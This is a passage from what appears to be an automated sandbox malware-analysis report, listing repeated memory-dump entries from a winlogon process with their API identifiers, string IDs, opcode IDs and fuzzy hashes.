                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 2B51E533B917888AFB59CB15E044FAC7791FB94B9DF948110EA4A47B88D77AC841C783
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 02134d3feda2e96eb50003ad244677908c7789116ae644b7e14578b12ac1f724
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 0E51D333A803888AFB768F51D244B987BA0FB54B9CF944119DA8D47BD5CB7AC451CB83
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: ad04fe1eb2a1edeef54e6bc75b4d769991b9c3402fe3d2ab12d2ac4a189050a6
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 6C51D03398034887FBB68F119244B9877A0FB50B9EF944116DAC967B91CB3AC452C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: ed6a1ed037bc458e94a604c567b67e28dc429d86a9db094778d64014e96594a0
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: F361B433908BC881FB628F25E540BDEB7A0FB84799F445215EBC823B55DB39C091CB82
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 10efc11f376cab87ef4acdaf2b77ccec9d4123c0fd27d91e5cae546ecccaa4a1
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: CA51B23398038887FBB68F119644B9877A1FB50B88F94811ADA5943B95C73BD553C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 2a22e60a9b3f854304751452df9d98a64753f55934e27dd4094366773aca3260
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 9C61B933908BC881EB728F15E5407DDB7A0FB85798F448219EB9817B55DB7EC192CB82
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: ff7a276064ca23684de81406a1f68796b44ce7f86f6096a08643deba12328983
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: E351C1339843888BFB768F11E644B9877A0FB50B9EF944116DA8947BD1CB3AD450D783
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 60592a73bcc56e8fc24094758dd9bb65472a20c058267f86d1c17b185443617f
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 3161AE33908BC881EB22CF15E540BDAB7A0FB85B99F444215EB9913B99DB7DC190CB42
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 28175376d5654a325b6e3448a41641f0585f000515273b2e813776c3207c95cb
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 25119032B5878591FB129B25E8007DB72A4FF88789FC004219E4993694EF7AC807C7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: f5c0b545fa3a07ccbfa5bb088918576c4613ccf87af992a5142b58f16c0f08fa
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: F411A532B5878551FB129B25E8007DA76A5BF48748FC08429AA4983694EF3BC90BC7C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 913d229e8f2f92123c0244f313f8f46853348ecc3afd0aa29f5a796bf9d5dd00
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 6311DA3375078551FB129B25E8007DAB7A4FF84B4AFC004259E49C3695EF7AC985C783
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 0fe5e95353cfd2dd0c501b22aeddf9fd2a82a384c77f1e00d125b204ea73b71d
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: DFD1CB33B14B9889F712CFA5D440ADD37B1FB95B98F805116CE59ABB99DA35C00BC382
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: dd6aa663578507b66a76ee1b3aff8a7eb3297d8e7c986e84e6755fe8025d9d4f
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: B1D1CA33B14B8889F712CFA5D440ADC37B1FB54B98F814216EE49A7B99DA36D107C386
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 18d3852c168644b29a851a8876877b9c6a5370015fb03373ffbcdf4b1c2788c7
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: FBD1C833B55B8889F712CFA5D440ADC37B1FB44B98F804256CE4EA7B9ADA35C106C382
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 662269b3e822107970afb4c35fa0ae41ecd28bd6936e08448754d08bde8c420b
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 7F015732A50B84DAE715DF66A80499A77A0FBC8F88B894025DF4957728DE39D052C782
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 72ca8a3ca2c797191b1185e72d0950ed6f6b3868902fa79715834b3bdb5aef3e
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 18018B32A40B94CAE715DF62A80459977A0FB88F84F868025EB4943718DE39E052C386
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 067d4f9d96a6597854837632812c8a5965103370f5823a428bd146fe93ab2a8e
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 3F01AD73A45B84CAF715DF62E80458877B0FB88F85B464025DF4A43718DF35E191C382
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2A28DF), ref: 000001CA7D2A2A12
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 883afdda5ac88cf6514580bd6892867edb55701f6eb5cb203455b40a889b7c34
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 5E91F233A5075999FB528F659450BEE37A0FF94B8CF846106DE0A6BA85DB36C04783C3
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2228DF), ref: 000001CA7D222A12
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 68b43c0824a30f871ee081a9c83458cb90aaee78de66b724d65557e9164a7766
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 0791E033A5075899FB628F659850BED3BA0BF54B8CF854106EE0A57A94CA37D047C3CB
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D1F28DF), ref: 000001CA7D1F2A12
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 5eb7d5947bc20cfa67c7895d0bc5de5f10d0b69c3d0a7686c240678f5a04625b
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: E391EF33F5275899FB62CF659450BED3BA0BB54B8CF844146DE0A93A85DB36C446C383
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 309fc4a10813a887c16493d1ce2c5572945cc3e6c6069e0ff5507602679b0d55
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 99111836B50F088AFB01CB60E8547AA33A4FB59758F840E21DE6D967A4EB78C15583C2
                                            APIs
                                            Memory Dump Source
